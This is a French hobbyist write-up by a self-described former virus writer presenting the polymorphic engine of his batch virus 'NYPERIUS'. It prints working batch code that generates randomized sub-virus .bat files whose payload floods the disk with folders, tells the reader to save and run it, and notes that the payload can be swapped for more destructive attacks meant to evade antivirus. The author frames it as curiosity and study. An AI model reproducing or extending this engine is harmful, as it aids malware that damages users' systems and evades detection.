VIRUS INFORMATIQUE VIRUS INFORMATIQUE CRYPTOVIROLOGIE POLYMORPHISME en BATCH Par : Samuel De Cruz, étudiant Licence 3 – Psychologie.
PRESENTATION Ce document présente mes anciens travaux sur la conception de chapitres de codes permettant des techniques de protection et de confusion pour la survivabilité d’un virus informatique, format batch. En traitement par lot. Il ne s’agit pas d’un travail malveillant visant à nuire autrui. Il s’agit d’un travail de curiosité relatif à l’admiration du monde informatique et d’un haut respect intelligent et bienveillant de l’ingéniosité en matière de virologie informatique complexe. SYNTHESE RAPIDE La cryptographie est un premier pas pour protéger le code cœur du virus, son code d’attaque et/ou de prolifération. Cela dit, ce n’est nullement suffisant car, la crypto, ou le chiffrement, standard est largement vulnérable. Si par exemple je crypte le mot « VIRUS » par 18795646546. il suffit de découvrir, de capturer, de brute-forcer, ou de deviner 18795646546 pour connaitre le mot « VIRUS ». C’est là que certains Hackers spécialistes en Cryptovirologie ont donc évolués vers la méthodologie de l’art du Polymorphisme. Cette méthode, hautement sophistiquée, consiste à ajouter au virus un moteur de polymorphisme qui permet la création de plusieurs codes crypto, ayant donc, en configurations variables, la possibilité de cacher tout, ou partiellement le virus via plusieurs générations de chiffrements. Par exemple, le mot « VIRUS » sera d’abord caché par 19684, puis deux minutes plus tard par 57987464, et quatre minutes plus tard par 879876… Le processus cryptographique peut aussi générer des codes alphanumériques, où autre langage complexe, le rythme peut lui aussi varier… ainsi, « casser » le code devient plus compliqué et l’antivirus doit faire face à un nouveau défi. BATCH Le moteur polymorphique peut être réalisé en plusieurs formats, personnellement je suis un fanatique du batch. Dans ce document, nous allons voir mes codes de mon ancien virus informatique NYPERIUS. Mon ancien surnom de pirate informatique : NEPRAM, il apparait souvent dans mes anciens travaux viraux. Mes anciens virus sont « NYPERIUS », « HYPERIA », DARKLIGHT », « SOLARIA », … Mes travaux sur les virus informatiques datent essentiellement de l’année 2009 à 2013. Je suis l’auteur de toutes les lignes de code présentes dans ce document. Ce document n’est PAS une étude complète du virus NYPERIUS, ici, il ne sera fait présentation que du moteur polymorphique. SAMUEL DE CRUZ Rédaction Décembre 2016, premiers travaux datant de 2009. 26/12/2016
NYPERIUS Ce virus informatique est avant tout un virus purement réalisé en étude, pour comprendre certaines techniques. Sa première version remonte 2010. Il est visible sur cette petite capture d’écran : « xXx---N.exe ». Capable de mutation, de flood, de destruction Windows, de Worm (moteur : Bio Hazard), Métamorphisme par blocs, moteur Polymorphique, et d’un chapitre final Mutagénique (permettant la fusion avec d’autres virus bien spécifiques.). AUTOCRITIQUE RAPIDE Je tiens aussi à préciser que ce virus, comme les autres de mes efforts, est le résultat d’un travail solitaire avec un apprentissage lui aussi solitaire… Ce moteur polymorphique à donc une forme et un traitement que j’appréciais en ce temps d’étude passé, de ce fait, il est normale que désormais il soit dépassé, obsolète, et comporte des aspects critiquables. Mais malgré son âge et son format ancien, le principe reste toujours aussi brillant : le polymorphisme. POLYMORPHISME Comme préciser auparavant, ce document reste concentré sur le moteur Polymorphique et ne rentre pas dans les détails généraux du VIRUS. Donc, NYPERIUS possède en lui un moteur écrit en BATCH, capable de réaliser 6 sous – virus, aux formats BAT, qui vont respectivement déclencher une attaque. Cette attaque est laisser libre au HACKER selon ses motivations. Les 6 sous – virus ont chacun des crypto internes divergentes, car elles sont générées par ce code : %random% = un nombre aléatoire à 5 chiffres. Une lettre est rajouté en interne pour rendre la crypto alphanumérique en son résultat, mais l’alpha lui-même n’est pas polymorphique ici. Le résultat de ce calcule est le suivant : (la seconde ligne est un autre exemple, différente, car ce segment crypto qui permettra de cacher la fonction, est jamais identique) zZxXA6816D21341G25679H1518K20959Y4369L2590Y23547Y19588XxZz zZxXB1519D27755G30096H29894K30184Y18981L2740Y1188Y18858XxZz SAMUEL DE CRUZ Rédaction Décembre 2016, premiers travaux datant de 2009. 26/12/2016
MOTEUR POLYMORPHIQUE EN BACTH Mon tout premier moteur polymorphique réalisé en l’an 2010, celui-ci étant si puissant qu’il permet la réalisation de 6 sous - virus avec crypto aléatoire et donc, 6 attaques possibles en subordination. Non seulement cette technique est redoutable car polymorphique, mais même en cas de détection, se sont les sous – virus qui seront neutralisés, et pas le virus – mère avec son moteur. set PWR-A=N---%random%Y-Y-Y-Y-A set PWR-B=N---%random%Y-Y-Y-Y-B set PWR-C=N---%random%Y-Y-Y-Y-C set PWR-D=N---%random%Y-Y-Y-Y-D set PWR-E=N---%random%Y-Y-Y-Y-E set PWR-F=N---%random%Y-Y-Y-Y-F echo. set POLYMORPHIC-A=A%random%D%random%G%random%H%random%K%random%Y%random%L%random%Y%random%Y%random% set POLYMORPHIC-B=B%random%D%random%G%random%H%random%K%random%Y%random%L%random%Y%random%Y%random% set POLYMORPHIC-C=C%random%D%random%G%random%H%random%K%random%Y%random%L%random%Y%random%Y%random% set POLYMORPHIC-D=D%random%D%random%G%random%H%random%K%random%Y%random%L%random%Y%random%Y%random% echo zZxX%POLYMORPHIC-A%XxZz>>M1.txt set /p POLYMORPHIC-A-A= < M1.txt echo zZxX%POLYMORPHIC-B%XxZz>>M2.txt set /p POLYMORPHIC-B-B= < M2.txt echo zZxX%POLYMORPHIC-C%XxZz>>M3.txt set /p POLYMORPHIC-C-C= < M3.txt echo zZxX%POLYMORPHIC-D%XxZz>>M4.txt set /p POLYMORPHIC-D-D= < M4.txt REM ////// Polymorphisme Work Result - [A]. echo @echo off>>%PWR-A%.bat REM attrib +h %PWR-A%.bat echo Rem ------------------------------->>%PWR-A%.bat echo Rem ---Nepram Polymorphic Engine--->>%PWR-A%.bat echo Rem ---BATCH ALGORITHME PURE !!!--->>%PWR-A%.bat echo set %POLYMORPHIC-D-D%=set>>%PWR-A%.bat echo %%zZxX%POLYMORPHIC-D%XxZz%% %POLYMORPHIC-A-A%=mkdir>>%PWR-A%.bat echo %%zZxX%POLYMORPHIC-D%XxZz%% %POLYMORPHIC-B-B%=start>>%PWR-A%.bat echo %%zZxX%POLYMORPHIC-D%XxZz%% %POLYMORPHIC-C-C%=NYPERIUS-08>>%PWR-A%.bat echo %%zZxX%POLYMORPHIC-A%XxZz%% NYPERIUS-5A-%%random%%>>%PWR-A%.bat echo Exit>>%PWR-A%.bat REM ////// End of Polymorphisme - [A]. REM ======================================== Il suffit de copier et coller cet algorithme dans un fichier texte, le renommer en « Polymorphisme.bat » et l’exécuter. Il va réaliser là seulement 1 sous – virus, car se serait trop long de montrer tout le chapitre polymorphique. En exécutant le code, nous obtenons cela : SAMUEL DE CRUZ Rédaction Décembre 2016, premiers travaux datant de 2009. 26/12/2016
Donc le moteur à réalisé un fichier externe .bat, c’est le sous – virus. Si on l’exécute lui, il créer un dossier avec nom aléatoire. Cette création de dossier est une attaque, c’est un petit flood. Mais cette attaque peut être changée, remplacée par une attaque plus redoutable. Ici, c’est à titre d’exemple sympathique. Les fichiers M1,M2,M3,M4 sont des fichiers contenant des fragments de résultantes du calcule polymorphique. Ils sont là pour étude, c’est-à-dire : pour que le HACKER puisse étudier l’évolution polymorphique de son virus. Ces fichiers peuvent, par la suite, en attaque réelle, être dissimulés ou supprimés par le virus lui-même. C’est donc à titre d’étude. Si on créer un dossier GENERATION 2, on copie « Polymorphisme.bat » dedans, on re-exécute le code, on réobtient le même résultat : M1,M2… avec un nouveau sous - virus bat. Par contre, si on ouvre en lecture seulement les 2 sous - virus on constate que l’intérieure du code est différent : l’art du polymorphisme. SAMUEL DE CRUZ Rédaction Décembre 2016, premiers travaux datant de 2009. 26/12/2016
EXEMPLE REEL Voici une capture d’écran montrant une attaque réelle du virus NYPERIUS sur mon ordinateur, le disque dur est progressivement noyé par de nombreux dossiers polluants. On remarque le nom aléatoire des dossiers avec les sous - virus respectifs (eux aussi aux noms aléatoires et codes crypto internes aléatoires) : le tout généré par le moteur Polymorphique. La visibilité et les fichiers infos sont volontairement présentés pour l’étude, en attaque malveillante, tout peut être dissimulé. EXE et BAT le virus en exécutable, et sa version mutée auto - extractive par une commande spéciale batch. La mutation en bat est là renommée volontairement en .Txt pour éviter une continuation du virus en étude. SAMUEL DE CRUZ Rédaction Décembre 2016, premiers travaux datant de 2009. 26/12/2016
Si je zoom sur mes codes, je vois la différence de crypto, elle n’est pas identique, et cela sera le cas pour les 6 sous – virus réalisés par le moteur Polymorphique. Mon moteur peut être réécrit pour monter à plus que 6 sous – virus… et même calculer plus de chiffres… Un extrait du virus NYPERIUS avec son moteur polymorphique intra-crypté avec, comme nous pouvons le voir, un extrait qui présente jusqu’à la création du 3éme sous - virus. SAMUEL DE CRUZ Rédaction Décembre 2016, premiers travaux datant de 2009. 26/12/2016
Dans le cas d’une étude sympathique, nous pouvons programmé le virus pour qu’il nous communique l’avancement de son travail. Là, en fin de création du 6éme sous - virus, il nous indique que le polymorphisme est achevé, que le flood à débuter, et que son chapitre suivant de mutation est bientôt activé. Possibilité aussi de mettre en fichier LOG les dates et horaires des mutations successives des divers polymorphismes ou autres fonctions. SAMUEL DE CRUZ Rédaction Décembre 2016, premiers travaux datant de 2009. 26/12/2016
Merci – Respectueusement. Mr, Samuel De Cruz NOTE DE l’AUTEUR " le PSYTEC est une base de partage que j’ai réalisée dans le but de distribuer au monde, gratuitement et facilement, mes travaux et idées sur la futurologie robotique. Mais aussi, j’en profite pour partager mes anciens travaux de virologie informatique, en bienveillance, pour la curiosité et l’étude de l’ingénierie de virologie informatique. Ces travaux informatiques ne sont donc pas dans un objectif de nuire autrui, mais bel et bien dans l’objectif de curiosité et d’apprentissage. Je pense que les virus informatiques, le codage, la crypto, ainsi que tout ce qui compose ce magnifique et redoutable univers sera d’une grande importance dans la robotique futur : j’imagine déjà des futurs docteurs et spécialistes œuvrant au bon soin des machines malades, souffrantes d’infections par virus informatiques… Je crois en un avenir où il existera une PSYCHOLOGIE ROBOTIQUE, mais aussi, une VIROLOGIE INFORMATIQUE ROBOTIQUE pour le traitement des machines malades. » Merci – Respectueusement. Mr, Samuel De Cruz REMERCIEMENT Merci infiniment aux sorciers de « l’underground » et autres fanatiques de codages informatiques. Merci à VX Heaven. Et merci à tous ceux qui me connaissent mais que, pour des raisons de sécurité et d’anonymat, je ne peux pas dire leurs noms et prénoms. Contact et informations Psytec : voir page suivante SAMUEL DE CRUZ Rédaction Décembre 2016, premiers travaux datant de 2009. 26/12/2016
AUTEUR (informations scolaires datées Novembre 2016, photo année 2011) Mr, Samuel De Cruz, étudiant Licence 3 Psychologie à l’Université Blaise Pascal (Domaine : Psychologie Scientifique, Spécialité : Psychopathologie et Clinique), diplômé DEUG BAC+2 Psy, diplômé BAC informatique (STG GSI SGBDR), diplômé Ecole Supérieure d’Application des Transmissions (ESAT – CT1), Ecole Supérieure Militaire d’Anglais (COFAT PLS4444 DCL4B2) et CML3 et TOEIC, études militaires ENSOA et SIC ERM NEB. Diplômé de l’école CNFDI Psychologie Enfant/Adolescents/Généralité. Passionné de Robotique humanoïde, auteur de l’ouvrage de Science-Fiction-Robotique: « VIRTUALITY-FILLE MACHINE CIAA », gratuit, pour toujours, pour toute l’humanité. . Art 3D couverture, écrit, idée, présentation : Samuel De Cruz – daté 07/11/2016. . Contact : samdec86@yahoo.fr . Tel : 06 74 66 82 97 . Site Internet PSYTEC (téléchargement des documents) : http://www.virtuality-file.com/PSYTEC.htm . Facebook : https://www.facebook.com/samuel.decruz.90 . Collection de mes dessins 3D : https://www.flickr.com/photos/132163973@N03/sets SAMUEL DE CRUZ Rédaction Décembre 2016, premiers travaux datant de 2009. 26/12/2016